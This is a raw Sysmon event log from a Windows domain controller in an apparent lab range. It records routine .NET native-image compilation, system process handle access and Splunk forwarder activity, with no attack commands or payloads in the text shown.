21:00:56.660{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A108-60D3-5902-00000000CF01}3604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018678Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:56.660{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A108-60D3-5902-00000000CF01}3604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018677Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:56.551{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A108-60D3-5802-00000000CF01}6892C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018676Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:56.535{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A108-60D3-5802-00000000CF01}6892C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018675Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:56.535{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A108-60D3-5802-00000000CF01}6892C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018674Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:56.442{4DB9351A-A106-60D3-5502-00000000CF01}5348NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6N8DZP7DQ8\System.Data.SqlXml.ni.dll.auxMD5=2F85D73C550080ED183D8FF605BFD519,SHA256=CF53B900A1A1BAD58ED8DC32017757C9E09C3626BAFCA2600C5985167D8F15CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018673Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:56.442{4DB9351A-A106-60D3-5502-00000000CF01}5348NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6N8DZP7DQ8\System.Data.SqlXml.ni.dllMD5=9DC2547A52F82899F1458EA52F21C610,SHA256=E99B344179FED7E9FBBE6BE54B8C59E31C32CEA64F40722CA8E9A1DF315674C0,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018672Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:00:56.379{4DB9351A-A106-60D3-5502-00000000CF01}5348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\14e4-0\System.Data.SqlXml.dll2021-06-23 21:00:56.379 10341000x800000000000000018671Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:56.192{4DB9351A-A107-60D3-5702-00000000CF01}34921328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000018670Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:54.199{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61363-false10.0.1.12-8000- 10341000x800000000000000018691Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:57.676{4DB9351A-A109-60D3-5A02-00000000CF01}65684720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018690Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:57.145{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A109-60D3-5A02-00000000CF01}6568C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018689Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:57.145{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018688Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:57.145{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018687Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:57.145{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018686Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:57.145{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018685Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:57.145{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A109-60D3-5A02-00000000CF01}6568C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018684Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:57.145{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A109-60D3-5A02-00000000CF01}6568C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000018683Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:57.146{4DB9351A-A109-60D3-5A02-00000000CF01}6568C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018712Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.582{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A10A-60D3-5D02-00000000CF01}4276C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018711Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.567{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A10A-60D3-5D02-00000000CF01}4276C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018710Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.567{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A10A-60D3-5D02-00000000CF01}4276C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000018709Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:00:58.442{4DB9351A-9DDD-60D3-1100-00000000CF01}436C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d76872-0xdd9e6a45) 10341000x800000000000000018708Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.270{4DB9351A-A10A-60D3-5B02-00000000CF01}30207028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018707Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.223{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A10A-60D3-5C02-00000000CF01}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018706Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.207{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A10A-60D3-5C02-00000000CF01}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018705Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.207{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A10A-60D3-5C02-00000000CF01}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018704Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.145{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4B10253114124B93D6A97F6404BEAC6E,SHA256=D440714C5AC223D64D664A3541FF542550244F6271D7AE33ACA7F62CEF860511,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018703Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.114{4DB9351A-A108-60D3-5902-00000000CF01}3604NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\OH4V91O7SE\System.Deployment.ni.dll.auxMD5=04E371113A68F37EC6E50CDD89393E66,SHA256=23273344BBEC508C1A0FF721BD6F0B1C3EF922539B8C6111A0CD9D00BA0E94B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018702Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.114{4DB9351A-A108-60D3-5902-00000000CF01}3604NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\OH4V91O7SE\System.Deployment.ni.dllMD5=DD75C8F1ACEA1E0D27218C74B2B5BF44,SHA256=27C3D42E97041608FDF3A77B76C1A28A2A52D5AAE3807A64780C5622F7CF2BF4,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018701Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:00:58.067{4DB9351A-A108-60D3-5902-00000000CF01}3604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e14-0\System.Deployment.dll2021-06-23 21:00:58.067 10341000x800000000000000018700Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.053{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A10A-60D3-5B02-00000000CF01}3020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018699Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 